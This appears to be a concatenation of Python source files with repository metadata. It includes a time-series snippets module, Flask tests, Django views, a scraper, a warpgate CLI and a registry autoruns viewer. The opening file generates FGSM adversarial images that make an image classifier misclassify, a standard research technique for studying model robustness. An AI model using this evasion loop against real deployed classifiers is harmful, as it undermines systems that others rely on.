fetch_list = [out.name]
result = exe.run(eval_program,
fetch_list=fetch_list,
feed={ 'image':img })
result = result[0][0]
pred_label = np.argmax(result)
pred_score = result[pred_label].copy()
return pred_label, pred_score
######FGSM attack
#untarget attack
def attack_nontarget_by_FGSM(img, src_label):
pred_label = src_label
step = 8.0/64.0
eps = 32.0/64.0
while pred_label == src_label:
#生成对抗样本
adv=FGSM(adv_program=adv_program,eval_program=eval_program,gradients=gradients,o=img,
input_layer=input_layer,output_layer=out,step_size=step,epsilon=eps,
isTarget=False,target_label=0,use_gpu=use_gpu)
pred_label, pred_score = inference(adv)
step *= 2
if step > eps:
break
print("Test-score: {0}, class {1}".format(pred_score, pred_label))
adv_img=tensor2img(adv)
return adv_img
def attack_nontarget_by_FGSM_test(img, src_label):
pred_label = src_label
print("---------------AAAA-------------------Test-score: {0}, class {1}".format(pred_label, pred_label))
pred_label, pred_score = inference(img)
print("---------------BBBB-------------------Test-score: {0}, class {1}".format(pred_score, pred_label))
####### Main #######
def get_original_file(filepath):
with open(filepath, 'r') as cfile:
full_lines = [line.strip() for line in cfile]
cfile.close()
original_files = []
for line in full_lines:
label, file_name = line.split()
original_files.append([file_name, int(label)])
return original_files
def gen_adv():
mse = 0
original_files = get_original_file(input_dir + val_list)
for filename, label in original_files:
img_path = input_dir + filename
print("Image: {0} ".format(img_path))
img=process_img(img_path)
# attack_nontarget_by_FGSM_test(img, label)
prelabel, xxxx = inference(img)
if label == prelabel:
adv_img = attack_nontarget_by_FGSM(img, label)
else:
adv_img = tensor2img(img)
image_name, image_ext = filename.split('.')
##Save adversarial image(.png)
save_adv_image(adv_img, output_dir+image_name+'.jpg')
# attack_nontarget_by_FGSM_test(img, label)
org_img = tensor2img(img)
score = calc_mse(org_img, adv_img)
print(score)
mse += score
print("ADV {} files, AVG MSE: {} ".format(len(original_files), mse/len(original_files)))
def main():
gen_adv()
if __name__ == '__main__':
main()
| [
"dyngqk@163.com"
] | dyngqk@163.com |
c4554c601893281110fded6f14187ef73c6df8da | 5086e9d2ae0c146f80f546e97788a2e4b1e5438f | /stumpy/aampdist_snippets.py | cbf29b4fd5eb31168e0994c1091e9d1e56555ee2 | [
"BSD-3-Clause"
] | permissive | HuoHuoisAlan/stumpy | a6c9952c2dd3343710521858295145b7eca8f727 | 01e867cfbef6f827b5b28913fd76a4eda59c5fed | refs/heads/main | 2023-04-18T17:42:47.952135 | 2021-05-09T23:47:01 | 2021-05-09T23:47:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,043 | py | # STUMPY
# Copyright 2019 TD Ameritrade. Released under the terms of the 3-Clause BSD license.
# STUMPY is a trademark of TD Ameritrade IP Company, Inc. All rights reserved.
import math
import numpy as np
from .core import check_window_size
from .aampdist import _aampdist_vect
def _get_all_aampdist_profiles(
T,
m,
percentage=1.0,
s=None,
mpdist_percentage=0.05,
mpdist_k=None,
mpdist_custom_func=None,
):
"""
For each non-overlapping subsequence, `S[i]`, in `T`, compute the matrix profile
distance measure vector between the `i`th non-overlapping subsequence and each
sliding window subsequence, `T[j : j + m]`, within `T` where `j < len(T) - m + 1`.
Parameters
----------
T : ndarray
The time series or sequence for which to find the snippets
m : int
The window size for each non-overlapping subsequence, `S[i]`.
percentage : float, default 1.0
With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
is the percentage of `S[i]` (i.e., `percentage * m`) to set the `s` to. When
`percentage == 1.0`, then the full length of `S[i]` is used to compute the
`mpdist_vect`. When `percentage < 1.0`, then shorter subsequences from `S[i]`
is used to compute `mpdist_vect`.
s : int, default None
With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
is essentially the sub-subsequence length (i.e., a shorter part of `S[i]`).
When `s == m`, then the full length of `S[i]` is used to compute the
`mpdist_vect`. When `s < m`, then shorter subsequences with length `s` from
each `S[i]` is used to compute `mpdist_vect`. When `s` is not `None`, then
the `percentage` parameter is ignored.
mpdist_percentage : float, default 0.05
The percentage of distances that will be used to report `mpdist`. The value
is between 0.0 and 1.0.
mpdist_k : int
Specify the `k`th value in the concatenated matrix profiles to return. When
`mpdist_k` is not `None`, then the `mpdist_percentage` parameter is ignored.
mpdist_custom_func : object, default None
A custom user defined function for selecting the desired value from the
sorted `P_ABBA` array. This function may need to leverage `functools.partial`
and should take `P_ABBA` as its only input parameter and return a single
`MPdist` value. The `percentage` and `k` parameters are ignored when
`mpdist_custom_func` is not None.
Returns
-------
D : ndarray
MPdist profiles
Notes
-----
`DOI: 10.1109/ICBK.2018.00058 \
<https://www.cs.ucr.edu/~eamonn/Time_Series_Snippets_10pages.pdf>`__
See Table II
"""
if m > T.shape[0] // 2: # pragma: no cover
raise ValueError(
f"The window size {m} for each non-overlapping subsequence is too large "
f"for a time series with length {T.shape[0]}. "
f"Please try `m <= len(T) // 2`."
)
right_pad = 0
if T.shape[0] % m != 0:
right_pad = int(m * np.ceil(T.shape[0] / m) - T.shape[0])
pad_width = (0, right_pad)
T = np.pad(T, pad_width, mode="constant", constant_values=np.nan)
n_padded = T.shape[0]
D = np.empty(((n_padded // m) - 1, n_padded - m + 1))
if s is not None:
s = min(int(s), m)
else:
percentage = min(percentage, 1.0)
percentage = max(percentage, 0.0)
s = min(math.ceil(percentage * m), m)
# Iterate over non-overlapping subsequences, see Definition 3
for i in range((n_padded // m) - 1):
start = i * m
stop = (i + 1) * m
S_i = T[start:stop]
D[i, :] = _aampdist_vect(
S_i,
T,
s,
percentage=mpdist_percentage,
k=mpdist_k,
custom_func=mpdist_custom_func,
)
stop_idx = n_padded - m + 1 - right_pad
D = D[:, :stop_idx]
return D
def aampdist_snippets(
T,
m,
k,
percentage=1.0,
s=None,
mpdist_percentage=0.05,
mpdist_k=None,
):
"""
Identify the top `k` snippets that best represent the time series, `T`
Parameters
----------
T : ndarray
The time series or sequence for which to find the snippets
m : int
The snippet window size
k : int
The desired number of snippets
percentage : float, default 1.0
With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
is the percentage of `S[i]` (i.e., `percentage * m`) to set the `s` to. When
`percentage == 1.0`, then the full length of `S[i]` is used to compute the
`mpdist_vect`. When `percentage < 1.0`, then shorter subsequences from `S[i]`
is used to compute `mpdist_vect`.
s : int, default None
With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
is essentially the sub-subsequence length (i.e., a shorter part of `S[i]`).
When `s == m`, then the full length of `S[i]` is used to compute the
`mpdist_vect`. When `s < m`, then shorter subsequences with length `s` from
each `S[i]` is used to compute `mpdist_vect`. When `s` is not `None`, then
the `percentage` parameter is ignored.
mpdist_percentage : float, default 0.05
The percentage of distances that will be used to report `mpdist`. The value
is between 0.0 and 1.0.
mpdist_k : int
Specify the `k`th value in the concatenated matrix profiles to return. When
`mpdist_k` is not `None`, then the `mpdist_percentage` parameter is ignored.
Returns
-------
snippets : ndarray
The top `k` snippets
snippets_indices : ndarray
The index locations for each of top `k` snippets
snippets_profiles : ndarray
The MPdist profiles for each of the top `k` snippets
snippets_fractions : ndarray
The fraction of data that each of the top `k` snippets represents
snippets_areas : ndarray
The area under the curve corresponding to each profile for each of the top `k`
snippets
Notes
-----
`DOI: 10.1109/ICBK.2018.00058 \
<https://www.cs.ucr.edu/~eamonn/Time_Series_Snippets_10pages.pdf>`__
See Table I
"""
if m > T.shape[0] // 2: # pragma: no cover
raise ValueError(
f"The snippet window size of {m} is too large for a time series with "
f"length {T.shape[0]}. Please try `m <= len(T) // 2`."
)
check_window_size(m, max_size=T.shape[0] // 2)
D = _get_all_aampdist_profiles(
T,
m,
percentage=percentage,
s=s,
mpdist_percentage=mpdist_percentage,
mpdist_k=mpdist_k,
)
pad_width = (0, int(m * np.ceil(T.shape[0] / m) - T.shape[0]))
T_padded = np.pad(T, pad_width, mode="constant", constant_values=np.nan)
n_padded = T_padded.shape[0]
snippets = np.empty((k, m))
snippets_indices = np.empty(k, dtype=np.int64)
snippets_profiles = np.empty((k, D.shape[-1]))
snippets_fractions = np.empty(k)
snippets_areas = np.empty(k)
Q = np.full(D.shape[-1], np.inf)
indices = np.arange(0, n_padded - m, m)
for i in range(k):
profile_areas = np.sum(np.minimum(D, Q), axis=1)
idx = np.argmin(profile_areas)
snippets[i] = T[indices[idx] : indices[idx] + m]
snippets_indices[i] = indices[idx]
snippets_profiles[i] = D[idx]
snippets_areas[i] = np.sum(np.minimum(D[idx], Q))
Q[:] = np.minimum(D[idx], Q)
total_min = np.min(snippets_profiles, axis=0)
for i in range(k):
mask = snippets_profiles[i] <= total_min
snippets_fractions[i] = np.sum(mask) / total_min.shape[0]
total_min = total_min - mask.astype(np.float64)
return (
snippets,
snippets_indices,
snippets_profiles,
snippets_fractions,
snippets_areas,
)
| [
"seanmylaw@gmail.com"
] | seanmylaw@gmail.com |
43bb8e261178ccdbc8e0f38e34e559c1b2793e98 | 7bfb0fff9d833e53573c90f6ec58c215b4982d14 | /1688_count_matches.py | 0df81efb7ce040266c81c8a31339b3ec5db755e9 | [
"MIT"
] | permissive | claytonjwong/leetcode-py | 6619aa969649597a240e84bdb548718e754daa42 | 16bbf8ac0ba5c80fe3ef67ade0d61a12991270a7 | refs/heads/master | 2023-07-14T23:40:26.569825 | 2021-08-22T17:23:20 | 2021-08-22T17:23:20 | 279,882,918 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | #
# 1688. Count of Matches in Tournament
#
# Q: https://leetcode.com/problems/count-of-matches-in-tournament/
# A: https://leetcode.com/problems/count-of-matches-in-tournament/discuss/970250/Kt-Js-Py3-Cpp-1-Liners
#
class Solution:
def numberOfMatches(self, N: int) -> int:
return 0 if N == 1 else N // 2 + self.numberOfMatches(N // 2 + int(N & 1))
| [
"claytonjwong@gmail.com"
] | claytonjwong@gmail.com |
8149d78a21a4530ab537abc4fe3892b1c77bac7f | a47ac7c64cb6bb1f181eadff8e4b24735c19080a | /PythonStudy/7-模块/a/Titan.py | 957bf78140bb6a110f980f0763207417854d9978 | [
"MIT"
] | permissive | CoderTitan/PythonDemo | 6dcc88496b181df959a9d43b963fe43a6e4cb032 | feb5ef8be91451b4622764027ac684972c64f2e0 | refs/heads/master | 2020-03-09T09:15:28.299827 | 2018-08-21T03:43:25 | 2018-08-21T03:43:25 | 128,708,650 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 669 | py |
# 一个.py文件就是一个模块
'''
def sayGood():
print('good')
def sayNice():
print('nice')
def sayBad():
print('bad')
age = 20
name = 'titan'
print('这是Titan模块')
'''
# 每一个模块中都有一个__name__属性, 当其值等于__main__时, 表明该模块自身在执行, 否则被引入了其他文件
# 当前文件如果为程序的入口文件, 则__name__属性的值为__main__
if __name__ == '__main__':
print('这是Titan模块--a')
else:
def sayGood():
print('good--a')
def sayNice():
print('nice--a')
def sayBad():
print('bad--a')
age = 20
name = 'titan--a'
| [
"quanjunt@163.com"
] | quanjunt@163.com |
fa060e2a53f5effc20a8ce419c69bbe06bf117b4 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_22416.py | 84c894c7c3f546ab1aaffeb33d766e1d830f19d6 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | # Iron Python Error: expected <type 'bytes'> or bytearray, got <type 'str'> for Serial comm
ser.write(bytes(message.encode('utf-8')))
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
8bd9e1c2de7c0fb1b38880603978273791276919 | 854ec5a700af132a3423be5a27a8857d2d8357a6 | /project/tests/test__config.py | c7f681e4c786c681690d511179d626d9967463b3 | [
"MIT"
] | permissive | mohammad-chavoshipor/flask-challenge | 8f53ce80b84e88c101eec4e7e216a9e7625eec62 | 6902a43d6c5f435edc668bc51fc08cd785ffb965 | refs/heads/master | 2021-06-12T15:04:27.211542 | 2017-03-10T19:02:58 | 2017-03-10T19:02:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,736 | py | # project/server/tests/integration/test_config.py
import unittest
from flask import current_app
from flask_testing import TestCase
from project.server import app
class TestDevelopmentConfig(TestCase):
def create_app(self):
app.config.from_object('project.server.config.DevelopmentConfig')
return app
def test_app_is_development(self):
self.assertFalse(current_app.config['TESTING'])
self.assertTrue(app.config['DEBUG'] is True)
self.assertFalse(current_app is None)
self.assertFalse('data_test.json' in app.config['DATA_FILE'])
self.assertTrue('data_dev.json' in app.config['DATA_FILE'])
self.assertFalse('stats_test.json' in app.config['STATS_FILE'])
self.assertTrue('stats_dev.json' in app.config['STATS_FILE'])
class TestTestingConfig(TestCase):
def create_app(self):
app.config.from_object('project.server.config.TestingConfig')
return app
def test_app_is_testing(self):
self.assertTrue(current_app.config['TESTING'])
self.assertTrue(app.config['DEBUG'] is True)
self.assertTrue('data_test.json' in app.config['DATA_FILE'])
self.assertFalse('data_dev.json' in app.config['DATA_FILE'])
self.assertTrue('stats_test.json' in app.config['STATS_FILE'])
self.assertFalse('stats_dev.json' in app.config['STATS_FILE'])
class TestProductionConfig(TestCase):
def create_app(self):
app.config.from_object('project.server.config.ProductionConfig')
return app
def test_app_is_production(self):
self.assertFalse(current_app.config['TESTING'])
self.assertTrue(app.config['DEBUG'] is False)
if __name__ == '__main__':
unittest.main()
| [
"hermanmu@gmail.com"
] | hermanmu@gmail.com |
83bcec5f7f7b822b4d5ee74bb80925b5e1c023e9 | 689eff74c3687f8386cbbdf4ff1d0c6b01568ba6 | /app/base/views.py | 281a6fd672ab301a139d9efebe1d4050f82f5bff | [] | no_license | huyquyet/projectBRS | fc50aac595112823c44952e137f11d6a3f6765a3 | 5a2f994a98f97db4b1717bc6187910ce9ad889e6 | refs/heads/master | 2021-01-10T10:09:44.265887 | 2015-12-16T03:53:39 | 2015-12-16T03:53:39 | 44,585,735 | 0 | 0 | null | 2015-12-15T07:16:39 | 2015-10-20T06:08:22 | HTML | UTF-8 | Python | false | false | 815 | py | from django.db.models import Avg
from django.views.generic.base import ContextMixin
from app.book.models import Book
from app.category.models import Category
__author__ = 'FRAMGIA\nguyen.huy.quyet'
class BaseView(ContextMixin):
model = Book
def get_context_data(self, **kwargs):
ctx = super(BaseView, self).get_context_data(**kwargs)
ctx['base_list_book'] = return_list_book()
ctx['base_list_category'] = return_list_category()
return ctx
def return_list_book():
book = Book.objects.annotate(Avg('rating_book__rate')).order_by('-rating_book__rate__avg')[0:6]
for i in book:
i.rate = i.get_rating_book()
i.count_review = i.review_book.all().count()
return book
def return_list_category():
cate = Category.objects.all()
return cate
| [
"nguyenhuyquyet90@gmail.com"
] | nguyenhuyquyet90@gmail.com |
a58b5f4e97d7f6162d8a7c522dc379644b1730e2 | 13130259156f6f9d16670cea88aa2608dd477d16 | /goeievraag/category/categorize_question.py | a12d559ec35a110035014a626c69944b5e85b342 | [] | no_license | fkunneman/DiscoSumo | d459251d543be5f4df38292a96f52baf4b520a0b | ed8f214834cf0c2e04a3bc429253502f7e79fbf8 | refs/heads/master | 2022-12-14T13:34:41.496963 | 2019-07-31T15:57:02 | 2019-07-31T15:57:02 | 140,422,779 | 2 | 1 | null | 2022-12-08T04:57:55 | 2018-07-10T11:36:00 | Python | UTF-8 | Python | false | false | 1,203 | py |
from qcat import QCat
import sys
model_file = sys.argv[1]
label_encoder_file = sys.argv[2]
category2id_file = sys.argv[3]
vocabulary_file = sys.argv[4]
qc = QCat(model_file,label_encoder_file,category2id_file,vocabulary_file)
test_questions = ["Kunnen we volgende week weer schaatsen op natuurijs",
"Wat is het lekkerste recept voor boerenkool",
"Hoeveel kleuren heeft de regenboog",
"Wat is de symbolische betekenis van de kip die de vrouw vasthoudt op het schilderij De Nachtwacht",
"waar kan ik in amsterdam het best een dwerg hamster aanschaffen",
"Waarom zie je nooit babyduifjes",
"Hoe krijg je een weggelopen konijn ( ontsnapt ) weer terug",
"Wat is het synoniem voor synoniem",
"wat s de reden dat vogels niet vastvriezen aan een ijsschots",
"Als een winkel 24 uur per dag en 365 dagen per jaar geopend is , waarom zit er dan een slot op de deur"]
print('Now categorizing questions')
results = qc.main(test_questions,5)
for i,result in enumerate(results):
print('TOP 5 categories for question',test_questions[i],':',result)
| [
"thiago.castro.ferreira@gmail.com"
] | thiago.castro.ferreira@gmail.com |
a1b9bf680534dbbfbc310a822deb14f1bb4e2dad | 51205b1a93bce66f1f47bd9eb5410e6f9b4c4da1 | /py/loop.py | e301447f632f4950299dabe067ddf745977ba7b9 | [
"MIT"
] | permissive | prataprc/gist | 70c2534079efb97cafd7bf58f1df4bb4284d13d1 | 4814ee6600d9f33dd940e4b3b9a98a0764a03bb5 | refs/heads/master | 2021-04-12T05:38:48.153925 | 2020-12-07T15:06:24 | 2020-12-07T15:06:24 | 32,151,350 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 657 | py | #! /usr/bin/python
# Some examples using the looping constructs in python
a = ['cat', 'dog', 'elephant']
x = 10
print type(x)
for x in a :
print x, type(x), len(x)
b = 'hello \n world'
for x in b :
print x, type(x), len(x)
# Dangerous iteration on a mutable sequence (list)
# for x in a :
# a.insert(1, x) # Dont do this !
# print a
# To acheive the above mentioned purpose do the following
for x in a[:] : # Now we taking a copy of the sequence
a.insert(0, x) # you can safely do this !
print a
# Using the range() function
for x in range(10,100,30) :
print x,
else
print "the loop normally exited"
| [
"prataprc@gmail.com"
] | prataprc@gmail.com |
c4e566e7859ca5d0c9129e87c6823acbc30ec828 | dd9e7df6b7dd915e749f537f490f62d38b7fa214 | /maintenance/management/commands/init_foreign_uiks.py | 4dc74e932e8ed0915027885c5da01ffad9782c2f | [] | no_license | mikpanko/elections_network | 383039b5310d006811f3638924bed41184bc2a64 | 6c14c79d9ec74c30d9998533ef73819f0e2e91bd | refs/heads/master | 2020-12-31T03:16:49.742384 | 2012-06-30T14:19:22 | 2012-06-30T14:19:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,174 | py | import os.path
from django.conf import settings
from django.core.management.base import BaseCommand
from scrapy.selector import HtmlXPathSelector
from grakon.utils import print_progress, read_url
FOREIGN_UIKS_URL = 'http://www.foreign-countries.vybory.izbirkom.ru/region/region/foreign-countries?action=show&root=1000085&tvd=100100032124923&vrn=100100031793505®ion=99&global=true&sub_region=99&prver=0&pronetvd=null&vibid=100100032124923&type=226'
class Command(BaseCommand):
help = "Init foreign uiks"
def handle(self, *args, **options):
from locations.models import FOREIGN_CODE, FOREIGN_NAME, Location
uiks = {}
for line in open(os.path.join(settings.PROJECT_PATH, 'data', 'foreign_uiks.csv'), 'r'):
uik_no, country_id, country_name, address = line.strip().split(',')
uiks[uik_no] = {'tik': int(country_id), 'address': address}
countries_by_id = dict((location.id, location) for location in Location.objects.exclude(region=None) \
.filter(tik=None).filter(region_code=FOREIGN_CODE))
foreign_countries = Location.objects.get(region=None, region_code=FOREIGN_CODE)
i = 0
for uik_option in HtmlXPathSelector(text=read_url(FOREIGN_UIKS_URL)) \
.select("//select[@name='gs']//option"):
uik_no = uik_option.select("text()").extract()[0].strip()[:4]
if uik_no not in uiks:
print uik_no
continue
url = uik_option.select("@value").extract()[0]
for param in url.split('?')[1].split('&'):
param_name, param_value = param.split('=')
if param_name in ('root', 'tvd'):
uiks[uik_no][param_name] = int(param_value)
location = Location(region=foreign_countries, tik=countries_by_id[uiks[uik_no]['tik']],
name=uik_no, region_name=FOREIGN_NAME, region_code=FOREIGN_CODE,
address=uiks[uik_no]['address'], tvd=uiks[uik_no]['tvd'],
root=uiks[uik_no]['root'], data='{}')
location.save()
i += 1
print_progress(i, 350)
| [
"sergkop@gmail.com"
] | sergkop@gmail.com |
6d9273b5b0345cc09ca089ba02ca5e9fd109dddc | 2d4380518d9c591b6b6c09ea51e28a34381fc80c | /CIM16/IEC61968/Metering/ComFunction.py | 5e3b93609661efbb5adef5b2bc8c60c312ecd3ea | [
"MIT"
] | permissive | fran-jo/PyCIM | 355e36ae14d1b64b01e752c5acd5395bf88cd949 | de942633d966bdf2bd76d680ecb20517fc873281 | refs/heads/master | 2021-01-20T03:00:41.186556 | 2017-09-19T14:15:33 | 2017-09-19T14:15:33 | 89,480,767 | 0 | 1 | null | 2017-04-26T12:57:44 | 2017-04-26T12:57:44 | null | UTF-8 | Python | false | false | 3,308 | py | # Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM16.IEC61968.Metering.EndDeviceFunction import EndDeviceFunction
class ComFunction(EndDeviceFunction):
"""Communication function of communication equipment or a device such as a meter.Communication function of communication equipment or a device such as a meter.
"""
def __init__(self, amrRouter='', amrAddress='', twoWay=False, *args, **kw_args):
"""Initialises a new 'ComFunction' instance.
@param amrRouter: Communication ID number (e.g. port number, serial number, data collector ID, etc.) of the parent device associated to this AMR module. Note: If someone swaps out a meter, they may inadvertently disrupt the AMR system. Some technologies route readings from nearby meters through a common collection point on an electricity meter. Removal of such a meter disrupts AMR for numerous nearby meters.
@param amrAddress: Communication ID number (e.g. serial number, IP address, telephone number, etc.) of the AMR module which serves this meter.
@param twoWay: True when the AMR module can both send and receive messages. Default is false (i.e., module can only send).
"""
#: Communication ID number (e.g. port number, serial number, data collector ID, etc.) of the parent device associated to this AMR module. Note: If someone swaps out a meter, they may inadvertently disrupt the AMR system. Some technologies route readings from nearby meters through a common collection point on an electricity meter. Removal of such a meter disrupts AMR for numerous nearby meters.
self.amrRouter = amrRouter
#: Communication ID number (e.g. serial number, IP address, telephone number, etc.) of the AMR module which serves this meter.
self.amrAddress = amrAddress
#: True when the AMR module can both send and receive messages. Default is false (i.e., module can only send).
self.twoWay = twoWay
super(ComFunction, self).__init__(*args, **kw_args)
_attrs = ["amrRouter", "amrAddress", "twoWay"]
_attr_types = {"amrRouter": str, "amrAddress": str, "twoWay": bool}
_defaults = {"amrRouter": '', "amrAddress": '', "twoWay": False}
_enums = {}
_refs = []
_many_refs = []
| [
"fran_jo@hotmail.com"
] | fran_jo@hotmail.com |
f82ef33cd4738f58765f3bcd648b1aa0d96dccc1 | 7f0c02b3eef636cc382484dd8015207c35cc83a8 | /lib/python/treadmill/sproc/warpgate.py | 95edca71b68bbd55ec900b55895d40d054d10f07 | [
"Apache-2.0"
] | permissive | ceache/treadmill | 4efa69482dafb990978bfdcb54b24c16ca5d1147 | 26a1f667fe272ff1762a558acfd66963494020ca | refs/heads/master | 2021-01-12T12:44:13.474640 | 2019-08-20T23:22:37 | 2019-08-20T23:22:37 | 151,146,942 | 0 | 0 | Apache-2.0 | 2018-10-01T19:31:51 | 2018-10-01T19:31:51 | null | UTF-8 | Python | false | false | 1,587 | py | """Warpgate client CLI.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import click
from treadmill import cli
from treadmill.warpgate import client
_LOGGER = logging.getLogger(__name__)
def init():
"""Top level command handler."""
@click.command()
@click.option('--policy-servers', type=cli.LIST,
required=True,
help='Warpgate policy servers')
@click.option('--service-principal', type=str,
default='host',
help='Warpgate service principal.')
@click.option('--policy', type=str, required=True,
envvar='WARPGATE_POLICY',
help='Warpget policy to use')
@click.option('--tun-dev', type=str, required=True,
help='Device to use when establishing tunnels.')
@click.option('--tun-addr', type=str, required=False,
help='Local IP address to use when establishing tunnels.')
def warpgate(policy_servers, service_principal, policy, tun_dev, tun_addr):
"""Run warpgate connection manager.
"""
_LOGGER.info(
'Launch client => %s, tunnel: %s[%s], policy: %s, principal: %s',
policy_servers,
tun_dev, tun_addr,
policy,
service_principal,
)
# Never exits
client.run_client(
policy_servers, service_principal, policy,
tun_dev, tun_addr
)
return warpgate
| [
"ceache@users.noreply.github.com"
] | ceache@users.noreply.github.com |
2b4389ecb7063df9de2c1a85552f21e19513c7d6 | da99b8e2a22318f1cafb0c78adb17c8fdebe01df | /PythonBookAdditional/第12章 Windows系统编程/code/CheckAndViewAutoRunsInSystem.py | 63a8ea52863a56fe57da939232caf9e2e9061c8b | [
"MIT"
] | permissive | lsjsss/PythonClass | f185873113d54ed6ae9b3ccc22cc5a71bf8f611d | 0d38d2ca4d14d5e0e2062e22ae2dbbefea279179 | refs/heads/master | 2023-02-18T13:43:32.453478 | 2023-02-08T07:17:09 | 2023-02-08T07:17:09 | 247,711,629 | 0 | 0 | null | 2022-04-25T07:03:53 | 2020-03-16T13:38:15 | Python | UTF-8 | Python | false | false | 1,579 | py | #check and view autoruns in the system
from win32api import *
from win32con import *
def GetValues(fullname):
name=str.split(fullname,'\\',1)
try:
if name[0]=='HKEY_LOCAL_MACHINE':
key=RegOpenKey(HKEY_LOCAL_MACHINE,name[1],0,KEY_READ)
elif name[0]=='HKEY_CURRENT_USER':
key=RegOpenKey(HKEY_CURRENT_USER,name[1],0,KEY_READ)
elif name[0]=='HKEY_CURRENT_ROOT':
key=RegOpenKey(HKEY_CURRENT_ROOT,name[1],0,KEY_READ)
elif name[0]=='HKEY_CURRENT_CONFIG':
key=RegOpenKey(HKEY_CURRENT_CONFIG,name[1],0,KEY_READ)
elif name[0]=='HKEY_USERS':
key=RegOpenKey(HKEY_USERS,name[1],0,KEY_READ)
else:
print('Error, no key named ',name[0])
info = RegQueryInfoKey(key)
for i in range(0,info[1]):
ValueName = RegEnumValue(key,i)
print(str.ljust(ValueName[0],20),ValueName[1])
RegCloseKey(key)
except BaseException as e:
print('Sth is wrong')
print(e)
if __name__=='__main__':
KeyNames=['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run',
'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce',
'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx',
'HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
'HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce']
for KeyName in KeyNames:
print(KeyName)
GetValues(KeyName)
| [
"lsjsss@live.cn"
] | lsjsss@live.cn |
6e2dd713422373ca3f97052be06e0a16981f04f9 | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/cloud/aiplatform/v1/aiplatform-v1-py/google/cloud/aiplatform/v1/schema/predict/instance_v1/types/video_classification.py | 2a302fc41f2bfb1ed6a3bebcbc1e33f705293c69 | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,307 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.cloud.aiplatform.v1.schema.predict.instance',
manifest={
'VideoClassificationPredictionInstance',
},
)
class VideoClassificationPredictionInstance(proto.Message):
r"""Prediction input format for Video Classification.
Attributes:
content (str):
The Google Cloud Storage location of the
video on which to perform the prediction.
mime_type (str):
The MIME type of the content of the video.
Only the following are supported: video/mp4
video/avi video/quicktime
time_segment_start (str):
The beginning, inclusive, of the video's time
segment on which to perform the prediction.
Expressed as a number of seconds as measured
from the start of the video, with "s" appended
at the end. Fractions are allowed, up to a
microsecond precision.
time_segment_end (str):
The end, exclusive, of the video's time
segment on which to perform the prediction.
Expressed as a number of seconds as measured
from the start of the video, with "s" appended
at the end. Fractions are allowed, up to a
microsecond precision, and "inf" or "Infinity"
is allowed, which means the end of the video.
"""
content = proto.Field(proto.STRING, number=1)
mime_type = proto.Field(proto.STRING, number=2)
time_segment_start = proto.Field(proto.STRING, number=3)
time_segment_end = proto.Field(proto.STRING, number=4)
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
